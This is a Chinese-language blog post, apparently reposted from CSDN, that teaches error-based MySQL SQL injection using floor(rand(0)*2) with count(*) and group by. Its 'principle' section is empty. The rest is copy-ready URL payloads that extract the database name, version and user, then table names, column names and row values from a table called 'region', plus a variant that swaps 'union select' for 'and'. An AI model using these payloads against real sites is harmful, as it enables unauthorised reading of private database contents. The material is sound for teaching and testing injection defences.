利用floor(rand(0)*2)报错返回信息
一、 报错原理
二、通用格式
?id=1 union select (select 1 from (select count(*),concat((payload),floor(rand(0)*2))x from information_schema.tables group by x)a)
//将payload插入即可
三、利用报错返回信息
- 返回数据库名称、版本信息、用户名称
// payload
(select concat(0x7e,database(),0x7e,version(),0x7e,user(),0x7e)
// 整体语句
id=1 union select (select 1 from(select count(*),concat((select concat(0x7e,database(),0x7e,version(),0x7e,user(),0x7e)),floor(rand(0)*2))x from information_schema.tables group by x)a);
- 返回该数据库中表信息
// payload
(select concat(0x7e,table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1)
//注意指定数据库,否则返回的是information_schema的表名信息
// 整体语句
?id=1 union select (select 1 from (select count(*),concat((select concat(0x7e,table_name,0x7e)from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
- 返回列信息
//payload
(select concat(0x7e,column_name,0x7e)from information_schema.columns where table_name='region' limit 0,1)
//整体语句
?id=1 union select (select 1 from (select count(*),concat( (select concat(0x7e,column_name,0x7e)from information_schema.columns where table_name='region' limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
//替换limit的值,获得全部列名称
- 获得字段值
//payload
(select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1)
//整体语句
?id=1 union select (select 1 from (select count(*),concat((select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
可将union select替换为and
即:
?id=1 and (select 1 from (select count(*),concat((select concat(0x7e,id,0x7e,pid,0x7e,name,0x7e,type,0x7e)from region limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
本文地址:https://blog.csdn.net/weixin_44940180/article/details/107633091
您可能感兴趣的文章:
如您对本文有疑问或者有任何想说的,请点击进行留言回复,万千网友为您解惑!
网友评论